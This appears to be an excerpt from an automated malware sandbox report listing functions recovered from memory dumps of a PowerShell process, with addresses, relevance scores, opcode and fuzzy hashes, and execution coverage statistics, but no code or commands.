                                                                        • Instruction ID: 55d263edf90e048b64c7a53f9cb7736aab719bd1552321d6c75c1ba665a81de0
                                                                        • Opcode Fuzzy Hash: 97a8a069b5e0b158699f444f7007aadf45bc803e9fc65f5561215c6eca91a75b
                                                                        • Instruction Fuzzy Hash: D042A070B00615DBDB15CBA8C824B6EBBAABFC9700F658069E505AF391CF71DD41CB91
                                                                        Function 071E1EB5 Relevance: 2.7, Strings: 2, Instructions: 247COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2255293987.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_71e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (fi$(fi
                                                                        • API String ID: 0-2143155470
                                                                        • Opcode ID: 45aa177a63f0bdcfb6d3005e2ca07654f0877aaca66455e224e1155c5a43808a
                                                                        • Instruction ID: b99641675c89f5803dc1e8bc62c9b15a6c835bb2845887373e1fbf135e474956
                                                                        • Opcode Fuzzy Hash: 45aa177a63f0bdcfb6d3005e2ca07654f0877aaca66455e224e1155c5a43808a
                                                                        • Instruction Fuzzy Hash: 7CA1AEB0A00616DFDB15CB68C854BAEBBFABF89700F65C069E505AB391CB31ED41CB51
                                                                        Function 071E1AD8 Relevance: 2.7, Strings: 2, Instructions: 236COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2255293987.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_71e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (fi$(fi
                                                                        • API String ID: 0-2143155470
                                                                        • Opcode ID: f0d4ce0aa106c1a5257b907f6eca5f78be2c3e51dbb21c9e2846453a4b6a288c
                                                                        • Instruction ID: 83302eaf75c830e04ffe64e5d485e32377c35048fa53d5d4bacb8faa449d42d1
                                                                        • Opcode Fuzzy Hash: f0d4ce0aa106c1a5257b907f6eca5f78be2c3e51dbb21c9e2846453a4b6a288c
                                                                        • Instruction Fuzzy Hash: 32919DB4B00219DFDB14CB58C455AAABBF6AF89314F25C069E805AF391CB72DD81CF61
                                                                        Function 00E9D1B4 Relevance: 2.7, Strings: 2, Instructions: 184COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2250169725.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_e90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: \V@n$\V@n
                                                                        • API String ID: 0-269168472
                                                                        • Opcode ID: a16ef55653c157ff6afd4dd546f1121eebb9710cf5881d5e7f8ee5a53dd04571
                                                                        • Instruction ID: ee8e135936cc7bab3612a2eef7282835c738c2044da4986111b9a74f49b8e8f3
                                                                        • Opcode Fuzzy Hash: a16ef55653c157ff6afd4dd546f1121eebb9710cf5881d5e7f8ee5a53dd04571
                                                                        • Instruction Fuzzy Hash: 757168B0E04259CFDF10CFA9C8817DEBBF1AF88714F149529E814B72A0EB749881CB91
                                                                        Function 00E9D1C0 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2250169725.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_e90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: \V@n$\V@n
                                                                        • API String ID: 0-269168472
                                                                        • Opcode ID: 817503d67d76677a16bb7c80c800bc3b35d0f07bb09561c6c904dec0120d8734
                                                                        • Instruction ID: bbb222687e7cfd39a1b085805366232d7ba77434c5bbd005cfe0093b78ed48c9
                                                                        • Opcode Fuzzy Hash: 817503d67d76677a16bb7c80c800bc3b35d0f07bb09561c6c904dec0120d8734
                                                                        • Instruction Fuzzy Hash: 6C7178B0E04319CFDF10CFA9C88179EBBF2AF88314F149529E814B7294EB749841CB81
                                                                        Function 00E99D40 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2250169725.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_e90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: h]@n$I@n
                                                                        • API String ID: 0-1390310056
                                                                        • Opcode ID: 0deea1b40fd1c8f52f2d045b1a9028bf9842f5f6a54f239c671d471ed34e20c8
                                                                        • Instruction ID: 19ba42e77f85559eee5e4a70290ae9162e28f4cf8ac398645f9f25cbe4ffe849
                                                                        • Opcode Fuzzy Hash: 0deea1b40fd1c8f52f2d045b1a9028bf9842f5f6a54f239c671d471ed34e20c8
                                                                        • Instruction Fuzzy Hash: 7A310A34A011188FCF25EB74C894AEEB7B6AF89305F1454EAD509AB351CB359E82CF81
                                                                        Function 00E9CB6C Relevance: 1.5, Strings: 1, Instructions: 278COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2250169725.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_e90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: \V@n
                                                                        • API String ID: 0-2463972958
                                                                        • Opcode ID: ec24445a3f96868aa228b92e784c80f94b591e878536c1aaadd60ec24e0ff12c
                                                                        • Instruction ID: 657cb9d117fd924d6bcab96cbb88d4e099336bffd2f111134fc56c16bea44c62
                                                                        • Opcode Fuzzy Hash: ec24445a3f96868aa228b92e784c80f94b591e878536c1aaadd60ec24e0ff12c
                                                                        • Instruction Fuzzy Hash: 21B15C70E002099FDF10DFA9C8857EDBBF2EF88718F249529D819B7294EB749845CB91
                                                                        Function 071E1ABD Relevance: 1.5, Strings: 1, Instructions: 208COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2255293987.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_71e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (fi
                                                                        • API String ID: 0-1767130463
                                                                        • Opcode ID: 56ff6cf6bbd8ab212eab34becf6a84f376af2d213d2601d02aa0ea5d2b4e112f
                                                                        • Instruction ID: 1f16916c3c5469c2fcdaf92ad359a5a144cce9fc1bfe4ed3596ed06be6ed6c0c
                                                                        • Opcode Fuzzy Hash: 56ff6cf6bbd8ab212eab34becf6a84f376af2d213d2601d02aa0ea5d2b4e112f
                                                                        • Instruction Fuzzy Hash: 368159B4A00619EFCB15CF58C454A99BBF6BF89314F19C099E805AB391C732ED81CF61
                                                                        Function 00E9E228 Relevance: .7, Instructions: 732COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2250169725.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_e90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6c32ea4ed67974bd8b9fa60c79dd5659a81e18c26fe47d6935d35103fbca8618
                                                                        • Instruction ID: fabd25369964d39fc9860f2ee012d077c36fe18c48e7d4a04f32c9f1b01c25d1
                                                                        • Opcode Fuzzy Hash: 6c32ea4ed67974bd8b9fa60c79dd5659a81e18c26fe47d6935d35103fbca8618
                                                                        • Instruction Fuzzy Hash: 0B624B34B00218CFDB18DB28C854BAEBBB2BF89304F119199E945AB395DF75AD41CF91
                                                                        Function 071E1618 Relevance: .4, Instructions: 390COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2255293987.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_71e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e53a2070f797050fff35937a0332caadd9ce47001bc5bb6622bcbc4bd77b0c25
                                                                        • Instruction ID: 4c0aeb9a6b99fe2f722479356a9030e641a52fc2a805dbb1ba72df2e1225ae78
                                                                        • Opcode Fuzzy Hash: e53a2070f797050fff35937a0332caadd9ce47001bc5bb6622bcbc4bd77b0c25
                                                                        • Instruction Fuzzy Hash: 34C17B71B0031AEFC71A8B789850A7ABBEA9FC6610B5480BBD501CB3D1DB71CD41D7A2
                                                                        Function 00E94098 Relevance: .4, Instructions: 369COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2250169725.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_e90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c5607c02851dcfddb06b32a069b44b0690d2e1da23104dd4d3426a11154fa1be
                                                                        • Instruction ID: 37c29a086c5f63d7b79d5252f8efb94176916c4d0dd9a16dee28152b66b68933
                                                                        • Opcode Fuzzy Hash: c5607c02851dcfddb06b32a069b44b0690d2e1da23104dd4d3426a11154fa1be
                                                                        • Instruction Fuzzy Hash: 78F1FB74A00249DFDB15CF98D894E9DBBB2FF88314F249159E905AB3A1C731ED82CB90
                                                                        Function 00E93870 Relevance: .3, Instructions: 326COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2250169725.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_e90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 294c4bd14fa9051433b5603bc6db8c979f9ef77976b8aac3ec4b996426f78ec2
                                                                        • Instruction ID: f733066d29b7fcf7f56ab7e399cb695d698afa4e0c95d3a541b795396fae4ef1
                                                                        • Opcode Fuzzy Hash: 294c4bd14fa9051433b5603bc6db8c979f9ef77976b8aac3ec4b996426f78ec2
                                                                        • Instruction Fuzzy Hash: A6D1E674A00219EFDB15CFA8D484A9DFBB2FF88314F249159E845AB355C771EE82CB90
                                                                        Function 00E9D43F Relevance: .3, Instructions: 260COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2250169725.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_e90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 763c912122c73b50afc91dadcde9d4279b6d4d47cbdd44457ca5e8f700f848e9
                                                                        • Instruction ID: 60b45b4d7c5758d8ba248bb976943c5ea7836cfa08dcc20c432c26e080c1c60f
                                                                        • Opcode Fuzzy Hash: 763c912122c73b50afc91dadcde9d4279b6d4d47cbdd44457ca5e8f700f848e9
                                                                        • Instruction Fuzzy Hash: 54A13C70E08259CFDF10CFA9D88579DBBF1AF88718F249129D814F7294EB749845CB91
                                                                        Function 00E92FF0 Relevance: .3, Instructions: 255COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2250169725.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_e90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 95dda8a9a651cf4bd5ead54d0db15febc8e6d56517c4180040a795933f738381
                                                                        • Instruction ID: 5cd7366d2e6e21c848d26e40cc062489fdf7a1c0f2575285fe8e7a5b3478d949
                                                                        • Opcode Fuzzy Hash: 95dda8a9a651cf4bd5ead54d0db15febc8e6d56517c4180040a795933f738381
                                                                        • Instruction Fuzzy Hash: FFA15974A00205CFCB09CFADC4949AEBBB2FF88314B248669D915AB765D731FD51CBA0
                                                                        Function 00E9E2C1 Relevance: .1, Instructions: 140COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2250169725.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_e90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e3f57e0847dd1df9545fdc240e8bc5507653992129d5ce49e1b75e12084d6074
                                                                        • Instruction ID: 5a72b0d4dfb3008564e615d2d70d8d4379d6d428052624a33bc0b66d13fbc2e7
                                                                        • Opcode Fuzzy Hash: e3f57e0847dd1df9545fdc240e8bc5507653992129d5ce49e1b75e12084d6074
                                                                        • Instruction Fuzzy Hash: E3513B34B003298FDB24DF68D854B9DBBB2FF89700F1181A9E645AB351DB71AD41CB91
                                                                        Function 071E15F9 Relevance: .1, Instructions: 125COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2255293987.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_71e0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a7eec466d79bec14bbcafa07ff6f798d5e518e8d4fb6f48b43921cc74026593b
                                                                        • Instruction ID: df3ea6278b40099dab61ac52aa7c40037d280cb6156e53cab203764f61660e0b
                                                                        • Opcode Fuzzy Hash: a7eec466d79bec14bbcafa07ff6f798d5e518e8d4fb6f48b43921cc74026593b
                                                                        • Instruction Fuzzy Hash: 174138B0B00316AFCB159F648840B6D7BE69FCA640F9940A6E901DF3E1DB71DD40D7A1
                                                                        Function 00E9AFFF Relevance: .1, Instructions: 122COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2250169725.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_e90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d283e53f8660bb1a5761c94f6a66b5528a5753e76d35c38add6afb1e5a932318
                                                                        • Instruction ID: b46ff424321f8654a58ddacc31f695c152de9b2449bbf557b648cda77c4b7c23
                                                                        • Opcode Fuzzy Hash: d283e53f8660bb1a5761c94f6a66b5528a5753e76d35c38add6afb1e5a932318
                                                                        • Instruction Fuzzy Hash: 3D5104B1D00348DFDF10CF9AC984BDEBBB5BF48710F24812AE509AB254DB75A946CB94
                                                                        Function 00E9B008 Relevance: .1, Instructions: 117COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2250169725.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_e90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7baf66bf77ca1e8e02902b37106729974f1a4f6a9e66675ee40bc468ba3850ad
                                                                        • Instruction ID: a0645046b50e1de5bd093237f68e2b3c01fe63a44484af6b3f35fc45843633db
                                                                        • Opcode Fuzzy Hash: 7baf66bf77ca1e8e02902b37106729974f1a4f6a9e66675ee40bc468ba3850ad
                                                                        • Instruction Fuzzy Hash: AA5103B1D00348CBDF10CF9AC984BCEBBB5BF48710F24812AE505AB254DB74A946CB94
                                                                        Function 00E93100 Relevance: .1, Instructions: 113COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2250169725.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_e90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d80be49ca83ab007d2209ebb1e58072ad860c8c9dc0e865d96e471d3222489fc
                                                                        • Instruction ID: 604b356cf2d0915d17f01931eaeba1bbc544a6137be4e32662ee70a977706456
                                                                        • Opcode Fuzzy Hash: d80be49ca83ab007d2209ebb1e58072ad860c8c9dc0e865d96e471d3222489fc
                                                                        • Instruction Fuzzy Hash: 19414B74A00505DFCB09CFA9C5989AEFBB1FF48310B158259D915AB364C732FE51CBA0
                                                                        Function 00E9AC8F Relevance: .1, Instructions: 96COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2250169725.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_e90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e0476d8ca368d72def9a937585164e8ad912ac2701074172125f2dafbfcae84a
                                                                        • Instruction ID: aa2d6801b153e97657546a97f5363cb6b32c774267c7bdd56e9dd450d5527ea9
                                                                        • Opcode Fuzzy Hash: e0476d8ca368d72def9a937585164e8ad912ac2701074172125f2dafbfcae84a
                                                                        • Instruction Fuzzy Hash: EB412EB1900349DFDB10CFA9C580ADEBFF5EF48314F24802AE809AB250DB74A985CB91
                                                                        Function 00E94941 Relevance: .1, Instructions: 95COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2250169725.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_e90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9b3870a3b3e88a7a89d30da24058d3b7108c90bf225254db5a9fa184cf519135
                                                                        • Instruction ID: 65c6dc6c0c01555b689ef8bb8478cec5267a34b5d13fa898ca384ff63d8fc41b
                                                                        • Opcode Fuzzy Hash: 9b3870a3b3e88a7a89d30da24058d3b7108c90bf225254db5a9fa184cf519135
                                                                        • Instruction Fuzzy Hash: AA313BB5A00209DFCB05CF58C9809AAFBF1FF89314B258299D914AB791D731ED51CBA0
                                                                        Function 00E9AC98 Relevance: .1, Instructions: 90COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2250169725.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_e90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d48f16fa860d8f7994c5a54dc03403a6c300e934ab70bbbae062707f2692836d
                                                                        • Instruction ID: 55adb79e82348e6025829ee200def95ba0921e8e98fa8b9802c3f5580bb8a147
                                                                        • Opcode Fuzzy Hash: d48f16fa860d8f7994c5a54dc03403a6c300e934ab70bbbae062707f2692836d
                                                                        • Instruction Fuzzy Hash: A541ECB0D00349DFDF14DFA9C984ADEBBB5EF88314F248029E809AB254DB75A945CB91
                                                                        Function 00E9404A Relevance: .1, Instructions: 88COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2250169725.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_e90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8209d518476328f443d0f0b4dd98bdd1a0cc58819bfc83871e35efbfc65c07f4
                                                                        • Instruction ID: cb788794ac7dc4af021205b69e16123927d11c52fdfc2f4569bcee2ecfcf6353
                                                                        • Opcode Fuzzy Hash: 8209d518476328f443d0f0b4dd98bdd1a0cc58819bfc83871e35efbfc65c07f4
                                                                        • Instruction Fuzzy Hash: 8B3118B4A01105CFCF14CF9DC994EAEB7B2EF99324B248659D915AB3A5C731EC82CB50
                                                                        Function 00E94960 Relevance: .1, Instructions: 87COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2250169725.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_e90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 685a1be8d45fa687945f6caccd42d3289d977c1f8f4aa4da002dd39c0f6c3cc7
                                                                        • Instruction ID: 893caa3454f0a6ef38cb09095ec57304f60dae86623649d5c665ee2cefc02a80
                                                                        • Opcode Fuzzy Hash: 685a1be8d45fa687945f6caccd42d3289d977c1f8f4aa4da002dd39c0f6c3cc7
                                                                        • Instruction Fuzzy Hash: EB3138B4A00209DFCB04CF5CC9809AAFBF1FF89310B658299D918A7751C731EC52CBA4
                                                                        Function 00E93860 Relevance: .1, Instructions: 86COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2250169725.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_e90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5f31ccf729d6cffe398de08959ed156d556b0b6687a53b11e1bff32834d210e6
                                                                        • Instruction ID: 543d4118b9e7058378faae76fea6a5ab609056644b4e8894b0aadd448bcd0040
                                                                        • Opcode Fuzzy Hash: 5f31ccf729d6cffe398de08959ed156d556b0b6687a53b11e1bff32834d210e6
                                                                        • Instruction Fuzzy Hash: F2318174A04205DFCF19CF98C8909AAFBB1FF89310B254296E515EB751C735ED41CBA1
                                                                        Function 00E9CE63 Relevance: .0, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2250169725.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_e90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f054ffed0271cbaaee5e09a527a2cf312b236b7bb5f6311f529065faa1d9a3b1
                                                                        • Instruction ID: 2deadc503168828b319a07f05901c39392ee99790a82fbe40287374eb3fd2ec8
                                                                        • Opcode Fuzzy Hash: f054ffed0271cbaaee5e09a527a2cf312b236b7bb5f6311f529065faa1d9a3b1
                                                                        • Instruction Fuzzy Hash: D5119D30D05248DFDF35EA94D5997BCB7B2AF4931DF24242AC402B6191EB7468C9CB1A
                                                                        Function 00E9ED71 Relevance: .0, Instructions: 22COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2250169725.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_e90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 02dc93cf9444d65c6ebcaefdae22ad4114507feabb85e600011ca34ed792523b
                                                                        • Instruction ID: 6775d9e37ba59500156dca32dd9c46d1ca36ab1e09921ffd1a09d52ed2f287e3
                                                                        • Opcode Fuzzy Hash: 02dc93cf9444d65c6ebcaefdae22ad4114507feabb85e600011ca34ed792523b
                                                                        • Instruction Fuzzy Hash: 52E0EDB4D0420A9F8F44DFB8A4511BEBBF4AA88300B10896BD829E3340EA3545018FD5
                                                                        Function 00E9ED80 Relevance: .0, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2250169725.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_e90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f06640776ca897329de6d7baa59202bc57e41f0fe6cfbc16d553c9f4862dc2cb
                                                                        • Instruction ID: 0dc92a8177bf5619df848ff78778be623915ae6caad8de41d94a27c80292c4e8
                                                                        • Opcode Fuzzy Hash: f06640776ca897329de6d7baa59202bc57e41f0fe6cfbc16d553c9f4862dc2cb
                                                                        • Instruction Fuzzy Hash: 86E0B6B4D0420E9F8F48EFB994411BEFBF4AB08300F1085AE9819E3340E63446018F95
                                                                        Function 00E9ED40 Relevance: .0, Instructions: 13COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2250169725.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_e90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dc5b0e3dfa6bf9715014d15edffd1ac031df0e173cca15056168ab724811efa0
                                                                        • Instruction ID: c20adf5e83399ce05cadaaebc44673a09af2cd0c37a3a202b923e7ee10eadc71
                                                                        • Opcode Fuzzy Hash: dc5b0e3dfa6bf9715014d15edffd1ac031df0e173cca15056168ab724811efa0
                                                                        • Instruction Fuzzy Hash: 5AD0A96048C3C38FDB2B8BB0A519288BFB0AF42302F0E01C3D18AC81A3C36C0498D722

                                                                        Non-executed Functions

                                                                        Function 00E9C830 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2250169725.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_e90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: \V@n
                                                                        • API String ID: 0-2463972958
                                                                        • Opcode ID: 87fd46d69b48752d973c9ef368ca0b92a814a73ff1817663fdcaf7536d2c87cb
                                                                        • Instruction ID: 88ba533cf07f64cdae1a4d9c24911511f2b116f190e1861760581c07948efde0
                                                                        • Opcode Fuzzy Hash: 87fd46d69b48752d973c9ef368ca0b92a814a73ff1817663fdcaf7536d2c87cb
                                                                        • Instruction Fuzzy Hash: F1916E71E002098FDF14EFA9C9857DDBBF2AF88714F249529E805F7294EB749845CB81

                                                                        Execution Graph

                                                                        Execution Coverage:4.6%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:12.8%
                                                                        Total number of Nodes:180
                                                                        Total number of Limit Nodes:14
